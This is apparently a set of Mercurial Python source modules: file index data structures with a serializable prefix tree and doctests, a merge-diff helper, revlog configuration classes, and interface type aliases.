"""Data structures for the file index."""

from __future__ import annotations

import itertools
import struct
import typing
from typing import Iterator, List, Union

from ..thirdparty import attr
from ..interfaces.types import HgPathT
from .. import error, util
from ..interfaces import file_index as int_file_index
from ..utils import docket, stringutil

# Force pytype to use the non-vendored package
if typing.TYPE_CHECKING:
    # noinspection PyPackageRequirements
    import attr

FileTokenT = int_file_index.FileTokenT

NodePointerT = int
"""A pseudo-pointer to a node in the tree file."""

LabelPositionT = int
"""The position of a node's label within the file path."""

ROOT_TOKEN = FileTokenT(0)
"""A special token for the root node."""

V1_FORMAT_MARKER = b"fileindex-v1"


@attr.s(slots=True)
class Docket:
    """Parsed file index docket."""

    STRUCT = struct.Struct(
        "".join(
            [
                ">",
                f"{len(V1_FORMAT_MARKER)}s",
                "3I",  # file sizes
                f"{docket.UID_SIZE}s" * 3,  # file IDs
                "3I",  # other integers
            ]
        )
    )

    # Should contain V1_FORMAT_MARKER.
    marker = attr.ib(type=bytes, default=V1_FORMAT_MARKER)
    # Used size of the list file in bytes.
    list_file_size = attr.ib(type=int, default=0)
    # Used size of the meta file in bytes.
    meta_file_size = attr.ib(type=int, default=0)
    # Used size of tree file in bytes.
    tree_file_size = attr.ib(type=int, default=0)
    # List file path ID.
    list_file_id = attr.ib(type=bytes, default=docket.UNSET_UID)
    # Meta file path ID.
    meta_file_id = attr.ib(type=bytes, default=docket.UNSET_UID)
    # Tree file path ID.
    tree_file_id = attr.ib(type=bytes, default=docket.UNSET_UID)
    # Pseudo-pointer to the root node in the tree file.
    tree_root_pointer = attr.ib(type=NodePointerT, default=0)
    # Number of unused bytes within tree_file_size.
    tree_unused_bytes = attr.ib(type=int, default=0)
    # Currently unused. Reset to zero when writing the docket.
    reserved_flags = attr.ib(type=int, default=0)
    # Paths to old data files to be removed.
    garbage_entries = attr.ib(type=List["GarbageEntry"], factory=list)

    @classmethod
    def parse_from(cls, data: memoryview) -> Docket:
        """Parse a file index docket from bytes."""
        if len(data) < cls.STRUCT.size:
            raise error.CorruptedState("file index docket file too short")
        fields = cls.STRUCT.unpack_from(data)
        garbage_list = GarbageList.parse_from(data[cls.STRUCT.size :])
        docket = cls(*fields, garbage_entries=garbage_list.entries)
        if docket.marker != V1_FORMAT_MARKER:
            raise error.CorruptedState("file index docket has wrong marker")
        docket.reserved_flags = 0
        return docket

    def serialize(self) -> bytes:
        """Serialize the file index docket to bytes."""
        *fields, _garbage_entries = attr.astuple(self, recurse=False)
        fixed = self.STRUCT.pack(*fields)
        garbage = GarbageList(self.garbage_entries).serialize()
        return fixed + garbage


@attr.s(slots=True)
class GarbageList:
    """The garbage list parsed from the docket.

    It consists of a header, an index of fixed size entries, and a buffer of
    paths that the index entries point into.
    """

    entries = attr.ib(type=list["GarbageEntry"])

    @classmethod
    def parse_from(cls, data: memoryview) -> GarbageList:
        header = GarbageListHeader.parse_from(data)
        rest = data[GarbageListHeader.STRUCT.size :]
        num = header.num_entries
        index = itertools.islice(GarbageIndexEntry.iter_parse(rest), num)
        rest = rest[GarbageIndexEntry.STRUCT.size * num :]
        path_buf = rest[: header.path_buf_size]
        return cls(
            [GarbageEntry.from_index(entry, path_buf) for entry in index]
        )

    def serialize(self) -> bytes:
        path_buf = b"".join(entry.path + b"\x00" for entry in self.entries)
        header = GarbageListHeader(
            num_entries=len(self.entries), path_buf_size=len(path_buf)
        )
        result = header.serialize()
        offset = 0
        for entry in self.entries:
            result += entry.to_index(offset).serialize()
            offset += len(entry.path) + 1
        result += path_buf
        return result


@attr.s(slots=True)
class GarbageListHeader:
    """Header of the garbage list in the docket."""

    STRUCT = struct.Struct(">II")

    num_entries = attr.ib(type=int)
    path_buf_size = attr.ib(type=int)

    @classmethod
    def parse_from(cls, data: memoryview) -> GarbageListHeader:
        return cls(*cls.STRUCT.unpack_from(data))

    def serialize(self) -> bytes:
        return self.STRUCT.pack(*attr.astuple(self))


@attr.s(slots=True)
class GarbageIndexEntry:
    """An entry in the garbage list index in the docket."""

    STRUCT = struct.Struct(">HIIH")

    ttl = attr.ib(type=int)
    timestamp = attr.ib(type=int)
    path_offset = attr.ib(type=int)
    path_length = attr.ib(type=int)

    @classmethod
    def iter_parse(cls, data: memoryview) -> Iterator[GarbageIndexEntry]:
        # iter_unpack checks it's a multiple, even though we're not reading all.
        end = len(data) - len(data) % cls.STRUCT.size
        return (cls(*fields) for fields in cls.STRUCT.iter_unpack(data[:end]))

    def serialize(self) -> bytes:
        return self.STRUCT.pack(*attr.astuple(self))


@attr.s(slots=True)
class GarbageEntry:
    """A garbage entry parsed from the docket."""

    ttl = attr.ib(type=int)
    timestamp = attr.ib(type=int)
    path = attr.ib(type=bytes)

    @classmethod
    def from_index(
        cls, entry: GarbageIndexEntry, path_buf: memoryview
    ) -> GarbageEntry:
        return cls(
            ttl=entry.ttl,
            timestamp=entry.timestamp,
            path=path_buf[entry.path_offset :][: entry.path_length],
        )

    def to_index(self, offset: int) -> GarbageIndexEntry:
        return GarbageIndexEntry(
            ttl=self.ttl,
            timestamp=self.timestamp,
            path_offset=offset,
            path_length=len(self.path),
        )


@attr.s(slots=True)
class Metadata:
    """Metadata for a token in the meta file."""

    STRUCT = struct.Struct(">IHH")

    # Pseudo-pointer to the start of the path in the list file.
    offset = attr.ib(type=int)
    # Length of the path.
    length = attr.ib(type=int)
    # Length of the path's dirname prefix, or 0 if there is no slash.
    dirname_length = attr.ib(type=int)

    @staticmethod
    def from_path(path: bytes, offset: int):
        dirname_length = 0
        if b'/' in path:
            dirname_length = path.rindex(b'/')
        return Metadata(
            offset=offset, length=len(path), dirname_length=dirname_length
        )

    @classmethod
    def parse_from(cls, data: memoryview) -> Metadata:
        return cls(*cls.STRUCT.unpack_from(data))

    def serialize(self) -> bytes:
        return self.STRUCT.pack(*attr.astuple(self))


class MetadataArray:
    """An array of Metadata values backed by a file."""

    def __init__(self, data: memoryview):
        self._data = data
        self._len = len(data) // Metadata.STRUCT.size

    def __len__(self):
        return self._len

    def __getitem__(self, index: int) -> Metadata:
        return Metadata.parse_from(self._data[index * Metadata.STRUCT.size :])

    def __iter__(self) -> Iterator[Metadata]:
        for i in range(self._len):
            yield self[i]


EMPTY_META_BYTES = b"\x00\x00\x00\x00\x00\x00\x00\x00"
"""A serialized empty file index meta file."""

assert EMPTY_META_BYTES == Metadata.from_path(b"", 0).serialize()


@attr.s(slots=True)
class TreeNodeHeader:
    """A node header in the tree file."""

    STRUCT = struct.Struct(">IBB")

    # A token that contains this node's label.
    token = attr.ib(type=FileTokenT)
    # The length of this node's label.
    label_length = attr.ib(type=int)
    # Number of children.
    num_children = attr.ib(type=int)

    @classmethod
    def parse_from(cls, data: memoryview) -> TreeNodeHeader:
        return cls(*cls.STRUCT.unpack_from(data))

    def serialize(self):
        return self.STRUCT.pack(*attr.astuple(self))


EMPTY_TREE_BYTES = b"\x00\x00\x00\x00\x00\x00"
"""A serialized empty file index tree file."""

assert EMPTY_TREE_BYTES == TreeNodeHeader(ROOT_TOKEN, 0, 0).serialize()


POINTER_STRUCT = struct.Struct(">I")
"""A file index node pseudo-pointer represented as 32-bit big-endian integer."""


@attr.s(slots=True)
class PointerOrToken:
    """Either a node pointer or a file token."""

    MASK = 1 << 31
    STRUCT = struct.Struct(">I")

    value = attr.ib(type=int)

    @classmethod
    def iter_parse(cls, data: memoryview) -> Iterator[PointerOrToken]:
        # iter_unpack checks it's a multiple, even though we're not reading all.
        end = len(data) - len(data) % cls.STRUCT.size
        return (cls(*fields) for fields in cls.STRUCT.iter_unpack(data[:end]))

    def serialize(self) -> bytes:
        return self.STRUCT.pack(*attr.astuple(self))

    @classmethod
    def pointer(cls, pointer: NodePointerT) -> PointerOrToken:
        return cls(pointer)

    @classmethod
    def token(cls, token: FileTokenT) -> PointerOrToken:
        return cls(cls.MASK | token)

    def get_pointer(self) -> NodePointerT | None:
        if self.value & self.MASK == 0:
            return NodePointerT(self.value)
        return None

    def get_token(self) -> FileTokenT | None:
        if self.value & self.MASK != 0:
            return FileTokenT(self.value & ~self.MASK)
        return None


@attr.s(slots=True)
class TreeNode:
    """A node parsed from the tree file.

    It stores a token and, indirectly, a label.
    The label is a substring of the file path corresponding to the token.
    The substring start position is implicit by summing parent label lengths.
    The node also stores the first characters of child labels, for performance
    """

    # A token that contains this node's label.
    token = attr.ib(type=FileTokenT)
    # The length of this node's label.
    label_length = attr.ib(type=int)
    # First character of each child label. These are all distinct.
    child_chars = attr.ib(type=bytes)
    # Pointers to this node's children, or tokens for the leaves.
    child_ptrs = attr.ib(type=list[PointerOrToken])

    @classmethod
    def parse_from(cls, data: memoryview) -> TreeNode:
        header = TreeNodeHeader.parse_from(data)
        rest = data[TreeNodeHeader.STRUCT.size :]
        n = header.num_children
        child_chars, rest = bytes(rest[:n]), rest[n:]
        rest = rest[: n * POINTER_STRUCT.size]
        child_ptrs = list(PointerOrToken.iter_parse(rest))
        return cls(header.token, header.label_length, child_chars, child_ptrs)

    def find_child(self, char: int) -> PointerOrToken | None:
        """Return the child pointer or token whose label starts with char."""
        try:
            index = self.child_chars.index(char)
        except ValueError:
            return None
        return self.child_ptrs[index]


@attr.s(slots=True, init=False)
class FileIndexView:
    """Read-only view of the file index."""

    list_file = attr.ib(type=memoryview)
    meta_array = attr.ib(type=MetadataArray)
    tree_file = attr.ib(type=memoryview)
    tree_file_size = attr.ib(type=int)
    tree_root_pointer = attr.ib(type=NodePointerT)
    tree_unused_bytes = attr.ib(type=int)
    root = attr.ib(type=TreeNode)

    @classmethod
    def empty(cls) -> FileIndexView:
        """Return a view of an empty file index."""
        return cls(
            docket=Docket(),
            list_file=util.buffer(b""),
            meta_file=util.buffer(b""),
            tree_file=util.buffer(b""),
        )

    def __init__(
        self,
        docket: Docket,
        list_file: memoryview,
        meta_file: memoryview,
        tree_file: memoryview,
    ):
        """Creates a file index view given a docket and file contents."""
        # Unlike in Rust we don't limit files to their docket "use size" fields
        # because that is already done before calling this method.
        # TODO: Make the implementations more consistent on this point.
        if len(meta_file) == 0:
            meta_file = util.buffer(EMPTY_META_BYTES)
        if len(tree_file) == 0:
            tree_file = util.buffer(EMPTY_TREE_BYTES)
        root = TreeNode.parse_from(tree_file[docket.tree_root_pointer :])
        if root.token != ROOT_TOKEN or root.label_length != 0:
            raise error.CorruptedState("invalid file index root node")
        if docket.tree_file_size > 0 and len(root.child_ptrs) == 0:
            raise error.CorruptedState("invalid file index singleton tree")
        self.list_file = list_file
        self.meta_array = MetadataArray(meta_file)
        self.tree_file = tree_file
        self.tree_file_size = docket.tree_file_size
        self.tree_root_pointer = docket.tree_root_pointer
        self.tree_unused_bytes = docket.tree_unused_bytes
        self.root = root

    def token_count(self) -> int:
        """Return the number of tokens in the file index."""
        return len(self.meta_array)

    def items(self) -> Iterator[tuple[HgPathT, FileTokenT]]:
        """Iterate the file index entries as (path, token).

        Excludes the root token.
        """
        iterator = enumerate(self.meta_array)
        next(iterator)  # skip root
        for token, meta in iterator:
            path = self._read_span(meta.offset, meta.length)
            yield bytes(path), FileTokenT(token)

    def get_path(self, token: FileTokenT) -> HgPathT | None:
        """Look up a path on disk by token."""
        meta = self.meta_array[token]
        return bytes(self._read_span(meta.offset, meta.length))

    def get_token(self, path: HgPathT) -> FileTokenT | None:
        """Look up a token on disk by path."""
        if not path:
            return None
        node = self.root
        position = 0
        while (child := node.find_child(path[position])) is not None:
            child_node = self._read_node(child, position)
            label = self._read_label(child_node, position)
            if not path[position:].startswith(label):
                break
            assert len(label) > 0
            position += len(label)
            if position == len(path):
                token = child_node.token
                if len(path) == self.meta_array[token].length:
                    return token
                break
            node = child_node
        return None

    def _read_span(self, offset: int, length: int) -> memoryview:
        """Read a span of bytes from the list file."""
        return self.list_file[offset : offset + length]

    def _read_label(
        self, node: TreeNode, position: LabelPositionT
    ) -> memoryview:
        """Read a node's label from the list file via the meta file."""
        metadata = self.meta_array[node.token]
        return self._read_span(metadata.offset + position, node.label_length)

    def _read_node(
        self, child: PointerOrToken, position: LabelPositionT
    ) -> TreeNode:
        """Read a node from a pointer or token."""
        if (ptr := child.get_pointer()) is not None:
            return TreeNode.parse_from(self.tree_file[ptr:])
        if (token := child.get_token()) is not None:
            return self._read_leaf_node(token, position)
        raise error.ProgrammingError(b"invalid PointerOrToken")

    def _read_leaf_node(
        self, token: FileTokenT, position: LabelPositionT
    ) -> TreeNode:
        """Read a leaf node by token."""
        meta = self.meta_array[token]
        label_length = meta.length - position
        return TreeNode(token, label_length, b"", [])

    def debug_iter_tree_nodes(self) -> Iterator[int_file_index.DebugTreeNode]:
        tree = self.tree_file

        def recur(pointer: NodePointerT, position: LabelPositionT):
            node = TreeNode.parse_from(tree[pointer:])
            label = bytes(self._read_label(node, position))
            position += node.label_length
            children = []
            for char, child in zip(node.child_chars, node.child_ptrs):
                if (ptr := child.get_pointer()) is not None:
                    rhs = ptr
                elif (token := child.get_token()) is not None:
                    child_node = self._read_leaf_node(token, position)
                    child_label = self._read_label(child_node, position)
                    rhs = bytes(child_label), token
                else:
                    print(child)
                    raise error.ProgrammingError(b"invalid PointerOrToken")
                children.append((bytes([char]), rhs))
            yield (pointer, node.token, label, children)
            for child in node.child_ptrs:
                if (ptr := child.get_pointer()) is not None:
                    yield from recur(ptr, position)

        yield from recur(self.tree_root_pointer, 0)


@attr.s(slots=True)
class MutableTreeNode:
    """Mutable version of `TreeNode`."""

    # See TreeNode.token.
    token = attr.ib(type=FileTokenT)
    # The label of this node.
    label = attr.ib(type=bytes)
    # Children of this node.
    children = attr.ib(type=List["MutableTreeChild"])

    def find_child(self, char: int) -> MutableTreeChild | None:
        """Return the child whose label starts with char."""
        for child in self.children:
            if child.char == char:
                return child
        return None


@attr.s(slots=True)
class MutableTreeChild:
    """A child of a `MutableTreeNode`."""

    # First character of the child node's label.
    char = attr.ib(type=int)
    # If True, node_pointer is an index into MutableTree.nodes.
    # If False, node_pointer is an offset into MutableTree.base.tree_file.
    node_is_in_memory = attr.ib(type=bool)
    # Pointer to the child node.
    node_pointer = attr.ib(type=Union[NodePointerT, int])


@attr.s(slots=True)
class SerializedMutableTree:
    """Result of serializing a `MutableTree`."""

    # Bytes to be written or appended to the tree file.
    bytes = attr.ib(type=bytearray)
    ## The fields below correspond to Docket fields.
    # New total size of the tree file.
    tree_file_size = attr.ib(type=int)
    # New root node offset.
    tree_root_pointer = attr.ib(type=NodePointerT)
    # New total number of unused bytes.
    tree_unused_bytes = attr.ib(type=int)


class MutableTree:
    """An in-memory prefix tree that can be serialized to a tree file.

    We can use it to build a tree from scratch:

    >>> files = [b"foo", b"bar", b"fool", b"baz", b"ba"]
    >>> list_file = b"".join(f + b"\\x00" for f in files)
    >>> meta_array = [Metadata.from_path(b"", 0)]
    >>> t = MutableTree(base=None)
    >>> offset = 0
    >>> t.debug()
    {}
    >>> t.insert(b"foo", 1)
    >>> meta_array.append(Metadata(offset, len(b"foo"), 0))
    >>> offset += len(b"foo") + 1
    >>> t.debug()
    {'f': (b'foo', 1)}
    >>> t.insert(b"bar", 2)
    >>> meta_array.append(Metadata(offset, len(b"bar"), 0))
    >>> offset += len(b"bar") + 1
    >>> t.debug()
    {'f': (b'foo', 1), 'b': (b'bar', 2)}
    >>> t.insert(b"fool", 3)
    >>> meta_array.append(Metadata(offset, len(b"fool"), 0))
    >>> offset += len(b"fool") + 1
    >>> t.debug()
    {'f': (b'foo', 1, {'l': (b'l', 3)}), 'b': (b'bar', 2)}
    >>> t.insert(b"baz", 4)
    >>> meta_array.append(Metadata(offset, len(b"baz"), 0))
    >>> offset += len(b"baz") + 1
    >>> t.debug()
    {'f': (b'foo', 1, {'l': (b'l', 3)}), 'b': (b'ba', 4, {'r': (b'r', 2), 'z': (b'z', 4)})}
    >>> t.insert(b"ba", 5)
    >>> meta_array.append(Metadata(offset, len(b"ba"), 0))
    >>> offset += len(b"ba") + 1
    >>> t.debug()
    {'f': (b'foo', 1, {'l': (b'l', 3)}), 'b': (b'ba', 5, {'r': (b'r', 2), 'z': (b'z', 4)})}

    Then we can serialize it:

    >>> s = t.serialize()
    >>> docket = Docket(
    ...     list_file_size=len(list_file),
    ...     tree_file_size=s.tree_file_size,
    ...     tree_root_pointer=s.tree_root_pointer,
    ... )
    >>> base = FileIndexView(
    ...     docket=docket,
    ...     list_file=list_file,
    ...     meta_file=b"".join(m.serialize() for m in meta_array),
    ...     tree_file=s.bytes,
    ... )

    Then we can create new nodes to append to the serialized tree:

    >>> t = MutableTree(base=base)
    >>> t.debug()
    {'f': '0x0020', 'b': '0x0010'}
    >>> t.insert(b"other", 6)
    >>> offset += len(b"other") + 1
    >>> t.debug()
    {'f': '0x0020', 'b': '0x0010', 'o': (b'other', 6)}
    >>> t.insert(b"food", 7)
    >>> offset += len(b"food") + 1
    >>> t.debug()
    {'f': (b'foo', 1, {'l': (b'l', 3), 'd': (b'd', 7)}), 'b': '0x0010', 'o': (b'other', 6)}
    >>> t.insert(b"barn", 8)
    >>> offset += len(b"barn") + 1
    >>> t.debug()
    {'f': (b'foo', 1, {'l': (b'l', 3), 'd': (b'd', 7)}), 'b': (b'ba', 5, {'r': (b'r', 2, {'n': (b'n', 8)}), 'z': (b'z', 4)}), 'o': (b'other', 6)}
    """

    def __init__(self, base: FileIndexView | None):
        self.base = base or FileIndexView.empty()
        self.nodes: list[MutableTreeNode] = []
        self.num_internal_nodes = 0
        self.num_copied_nodes = 0
        self.num_copied_internal_nodes = 0
        self.num_copied_children = 0
        self.num_paths_added = 0
        self._copy_node(self.base.root, 0)
        if self.base.tree_file_size == 0:
            self.num_copied_nodes = 0
            self.num_copied_internal_nodes = 0

    def token_count(self) -> int:
        """Return the number of distinct tokens in this tree and its base."""
        return self.base.token_count() + self.num_paths_added

    def _copy_node_at(self, ptr: NodePointerT, position: LabelPositionT) -> int:
        node = TreeNode.parse_from(self.base.tree_file[ptr:])
        return self._copy_node(node, position)

    def _copy_node(self, node: TreeNode, position: LabelPositionT) -> int:
        self.num_copied_nodes += 1
        if node.child_ptrs:
            self.num_internal_nodes += 1
            self.num_copied_internal_nodes += 1
            self.num_copied_children += len(node.child_ptrs)
        label = bytes(self.base._read_label(node, position))
        mutable_node = MutableTreeNode(node.token, label, [])
        index = len(self.nodes)
        # Push node first, then children, so root node stays at index 0.
        self.nodes.append(mutable_node)
        mutable_node.children = self._copy_node_children(node, position)
        return index

    def _copy_node_children(
        self, node: TreeNode, position: LabelPositionT
    ) -> list[MutableTreeChild]:
        position += node.label_length
        children = []
        for char, child in zip(node.child_chars, node.child_ptrs):
            if (ptr := child.get_pointer()) is not None:
                mutable_child = MutableTreeChild(
                    char=char, node_is_in_memory=False, node_pointer=ptr
                )
            elif (token := child.get_token()) is not None:
                child_node = self.base._read_leaf_node(token, position)
                index = self._copy_node(child_node, position)
                mutable_child = MutableTreeChild(
                    char=char, node_is_in_memory=True, node_pointer=index
                )
            else:
                raise error.ProgrammingError(b"invalid PointerOrToken")
            children.append(mutable_child)
        return children

    def insert(self, path: HgPathT, token: FileTokenT):
        assert len(path) != 0
        node = self.nodes[0]
        position = 0
        while (child := node.find_child(path[position])) is not None:
            if child.node_is_in_memory:
                child_index = child.node_pointer
            else:
                child_index = self._copy_node_at(child.node_pointer, position)
            child_node = self.nodes[child_index]
            label = child_node.label
            remainder = path[position:]
            length = len(stringutil.common_prefix(remainder, label))
            if length != len(label):
                child_node.label = label[length:]
                intermediate_node = MutableTreeNode(
                    token=token,
                    label=remainder[:length],
                    children=[
                        MutableTreeChild(
                            char=child_node.label[0],
                            node_is_in_memory=True,
                            node_pointer=child_index,
                        )
                    ],
                )
                intermediate_index = len(self.nodes)
                self.nodes.append(intermediate_node)
                self.num_internal_nodes += 1
                child.node_is_in_memory = True
                child.node_pointer = intermediate_index
                node = intermediate_node
                position += length
                break
            child.node_is_in_memory = True
            child.node_pointer = child_index
            node = child_node
            assert len(label) > 0
            position += len(label)
            if position == len(path):
                break
        remainder = path[position:]
        while remainder:
            n = min(len(remainder), 255)
            label, remainder = remainder[:n], remainder[n:]
            if not node.children:
                self.num_internal_nodes += 1
            node.children.append(
                MutableTreeChild(
                    char=label[0],
                    node_is_in_memory=True,
                    node_pointer=len(self.nodes),
                )
            )
            assert len(node.children) <= 255
            node = MutableTreeNode(token=token, label=label, children=[])
            self.nodes.append(node)
        node.token = token
        self.num_paths_added += 1

    def serialize(self) -> SerializedMutableTree | None:
        assert len(self.nodes) > 0, "must have root node"
        if self.num_paths_added == 0:
            # No need to write anything.
            return None
        # Terminology: final = old + additional = old + (copied + fresh).
        old_size = self.base.tree_file_size
        num_fresh_nodes = len(self.nodes) - self.num_copied_nodes
        root_is_fresh = self.num_copied_nodes == 0
        # There is a fresh child for every fresh node except the root.
        num_fresh_children = num_fresh_nodes - (1 if root_is_fresh else 0)
        num_additional_children = self.num_copied_children + num_fresh_children
        NODE_SIZE = TreeNodeHeader.STRUCT.size
        CHILD_SIZE = 1 + POINTER_STRUCT.size
        additional_size = (
            self.num_internal_nodes * NODE_SIZE
            + num_additional_children * CHILD_SIZE
        )
        final_size = old_size + additional_size
        buffer = bytearray()
        stack = [(0, 0)]
        UNSET_POINTER = 0xFFFFFFFF
        while stack:
            index, fixup_offset = stack.pop()
            if index != 0:
                # Fix up the incoming pointer.
                current_offset = old_size + len(buffer)
                POINTER_STRUCT.pack_into(buffer, fixup_offset, current_offset)
            node = self.nodes[index]
            header = TreeNodeHeader(
                token=node.token,
                label_length=len(node.label),
                num_children=len(node.children),
            )
            buffer.extend(header.serialize())
            for child in node.children:
                buffer.append(child.char)
            for child in node.children:
                if child.node_is_in_memory:
                    child_node = self.nodes[child.node_pointer]
                    if not child_node.children:
                        token = PointerOrToken.token(child_node.token)
                        buffer.extend(token.serialize())
                    else:
                        fixup_offset = len(buffer)
                        stack.append((child.node_pointer, fixup_offset))
                        buffer.extend(POINTER_STRUCT.pack(UNSET_POINTER))
                else:
                    buffer.extend(POINTER_STRUCT.pack(child.node_pointer))

        assert (
            len(buffer) == additional_size
        ), f"buffer size is {len(buffer)}, expected {additional_size}"
        old_unused_bytes = self.base.tree_unused_bytes
        additional_unused_bytes = (
            self.num_copied_internal_nodes * NODE_SIZE
            + self.num_copied_children * CHILD_SIZE
        )
        final_unused_bytes = old_unused_bytes + additional_unused_bytes
        assert final_unused_bytes <= old_size
        return SerializedMutableTree(
            bytes=buffer,
            tree_root_pointer=old_size,
            tree_file_size=final_size,
            tree_unused_bytes=final_unused_bytes,
        )

    def debug(self):
        """Return a dict representation for debugging."""

        def recur(children: list[MutableTreeChild]):
            result = {}
            for child in children:
                if child.node_is_in_memory:
                    node = self.nodes[child.node_pointer]
                    if node.children:
                        val = (node.label, node.token, recur(node.children))
                    else:
                        val = (node.label, node.token)
                else:
                    val = f"{child.node_pointer:#06x}"
                result[chr(child.char)] = val
            return result

        return recur(self.nodes[0].children)



# merge_utils.diff - logic to diff merges.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import annotations

from ..node import (
    nullrev,
)


def diff_parent(ctx):
    """get the context object to use as parent when diffing


    If diff.merge is enabled, an overlayworkingctx of the auto-merged parents
    will be returned.
    """
    # avoid a cycle
    from .. import (
        merge,
    )

    repo = ctx.repo()
    if repo.ui.configbool(b"diff", b"merge") and ctx.p2().rev() != nullrev:
        wctx = ctx.p1_overlay()
        with repo.ui.configoverride(
            {
                (
                    b"ui",
                    b"forcemerge",
                ): b"internal:merge3-lie-about-conflicts",
            },
            b"merge-diff",
        ):
            with repo.ui.silent():
                merge.merge(ctx.p2(), wc=wctx)
        return wctx
    else:
        return ctx.p1()



# revlogutils/config.py - small config class for Revlogs
#
# Copyright 2023 Pierre-Yves David <pierre-yves.david@octobus,net>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import annotations

import typing
from typing import Optional

from ..thirdparty import attr

# Force pytype to use the non-vendored package
if typing.TYPE_CHECKING:
    # noinspection PyPackageRequirements
    import attr


class _Config:
    """Abstract Revlog Config class"""

    def copy(self):
        return self.__class__(**self.__dict__)


@attr.s()
class FeatureConfig(_Config):
    """Hold configuration values about the available revlog features"""

    # the default compression engine
    compression_engine = attr.ib(default=b'zlib', type=bytes)
    # compression engines options
    compression_engine_options = attr.ib(
        default=attr.Factory(dict),
        type=dict[bytes, Optional[int]],
    )

    # can we use censor on this revlog
    censorable = attr.ib(default=False, type=bool)
    # do we ignore filelog censored revisions and return an empty string
    ignore_filelog_censored_revisions = attr.ib(default=False)
    # does this revlog use the "side data" feature
    has_side_data = attr.ib(default=False, type=bool)
    # might remove rank configuration once the computation has no impact
    compute_rank = attr.ib(default=False, type=bool)
    # parent order is supposed to be semantically irrelevant, so we
    # normally resort parents to ensure that the first parent is non-null,
    # if there is a non-null parent at all.
    # filelog abuses the parent order as flag to mark some instances of
    # meta-encoded files, so allow it to disable this behavior.
    canonical_parent_order = attr.ib(default=False, type=bool)
    # can ellipsis commit be used
    enable_ellipsis = attr.ib(default=False, type=bool)

    # use a flag to signal that a filerevision constains metadata
    hasmeta_flag = attr.ib(default=False, type=bool)

    def copy(self):
        new = super().copy()
        new.compression_engine_options = self.compression_engine_options.copy()
        return new


@attr.s()
class DataConfig(_Config):
    """Hold configuration value about how the revlog data are read"""

    # should we try to open the "pending" version of the revlog
    try_pending = attr.ib(default=False, type=bool)
    # should we try to open the "splitted" version of the revlog
    try_split = attr.ib(default=False, type=bool)
    #  When True, indexfile should be opened with checkambig=True at writing,
    #  to avoid file stat ambiguity.
    check_ambig = attr.ib(default=False, type=bool)

    # If true, use mmap instead of reading to deal with large index
    mmap_large_index = attr.ib(default=False, type=bool)
    # how much data is large
    mmap_index_threshold = attr.ib(default=None, type=Optional[int])
    # How much data to read and cache into the raw revlog data cache.
    chunk_cache_size = attr.ib(default=65536, type=int)

    # The size of the uncompressed cache compared to the largest revision seen.
    uncompressed_cache_factor = attr.ib(default=None, type=Optional[int])

    # The number of chunk cached
    uncompressed_cache_count = attr.ib(default=None, type=Optional[int])

    # Allow sparse reading of the revlog data
    with_sparse_read = attr.ib(default=False, type=bool)
    # minimal density of a sparse read chunk
    sr_density_threshold = attr.ib(default=0.50, type=float)
    # minimal size of data we skip when performing sparse read
    sr_min_gap_size = attr.ib(default=262144, type=int)

    # are delta encoded against arbitrary bases.
    generaldelta = attr.ib(default=False, type=bool)

    # index contains extra delta information
    #
    # (It is useful to have it here in addition to the one in DeltaConfig when
    # we need to exchange related information)
    delta_info = attr.ib(default=False)


@attr.s()
class DeltaConfig(_Config):
    """Hold configuration value about how new delta are computed

    Some attributes are duplicated from DataConfig to help havign each object
    self contained.
    """

    # can delta be encoded against arbitrary bases.
    general_delta = attr.ib(default=False, type=bool)
    # Allow sparse writing of the revlog data
    sparse_revlog = attr.ib(default=False, type=bool)
    # index contains extra delta information
    delta_info = attr.ib(default=False)
    # store delta quality information when possible
    store_quality = attr.ib(default=True, type=bool)
    # maximum length of a delta chain
    max_chain_len = attr.ib(default=None, type=Optional[int])
    # Maximum distance between delta chain base start and end
    max_deltachain_span = attr.ib(default=-1, type=int)
    # If `upper_bound_comp` is not None, this is the expected maximal gain from
    # compression for the data content.
    upper_bound_comp = attr.ib(default=None, type=int)
    # Should we try a delta against both parent
    delta_both_parents = attr.ib(default=True, type=bool)
    # Test delta base candidate group by chunk of this maximal size.
    candidate_group_chunk_size = attr.ib(default=0, type=int)
    # Should we display debug information about delta computation
    debug_delta = attr.ib(default=False, type=bool)
    # trust incoming delta by default
    lazy_delta = attr.ib(default=True, type=bool)
    # trust the base of incoming delta by default
    lazy_delta_base = attr.ib(default=False, type=bool)
    # trust the incoming compression if available (and compatible)
    lazy_compression = attr.ib(default=True, type=bool)
    # don't used incoming delta if they don't look optimal
    filter_suspicious_delta = attr.ib(default=False, type=bool)
    # check integrity of candidate bases before computing a delta against them
    validate_base = attr.ib(default=False, type=bool)
    # A theoretical maximum compression ratio for file content
    # Used to estimate delta size before compression. value <= 0 disable such
    # estimate.
    file_max_comp_ratio = attr.ib(default=10, type=int)
    # Use delta folding to estimate the size of a delta before actually
    # computing it.
    delta_fold_estimate = attr.ib(default=True, type=bool)
    # the maximal ratio between the original delta and a new delta optimized by folding.
    #
    # a value of None means the feature is disabled.
    delta_fold_tolerance = attr.ib(default=True, type=Optional[float])



# mercurial/interfaces/types.py - type alias for interfaces
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
#
# This is the main entry point for Mercurial code writing type annotations.
#
# The general principle can be summarized when dealing with <FooBar> object:
# - to type your code: use FooBarT from `mercurial.interface.types`
# - to subclass <FooBar>: use IFooBar from `mercurial.interface.foo_bar`

from __future__ import annotations

from typing import (
    Callable,
    Union,
)

from ._basetypes import (  # noqa: F401 (ignore imported but not used)
    CallbackCategoryT,
    Capabilities,
    FsPathT,
    HgPathT,
    NeedsTypeHint,
    NodeIdT,
    RevlogT,
    RevnumT,
    RevsetAliasesT,
    UiT,
    UserMsgT,
    VfsKeyT,
    VfsT,
)

from . import (
    bundle,
    config,
    context,
    exchange,
    matcher,
    misc,
    repository,
    status,
    transaction,
    ui as uimod,
)

ChangeContextT = context.IChangeContext

CfgRemapT = config.CfgRemapT
CfgSectionsT = config.CfgSectionsT

FileStorageT = repository.ifilestorage

HttpPasswordMgrT = uimod.IHttpPasswordMgr

PeerT = repository.IPeer
RepoT = repository.IRepo
# The other are copied for temporary backward compatibility
LocalRepoMainT = repository.IRepo
LocalRepoCompleteT = repository.IRepo
LocalRepoFileStorageT = repository.IRepo

RepoFileFnT = repository.IRepoFileFn

RequirementT = repository.RequirementT
RequirementSetT = repository.RequirementSetT

MatcherBadFuncT = matcher.BadFuncT
MatcherKindPatT = matcher.KindPatT
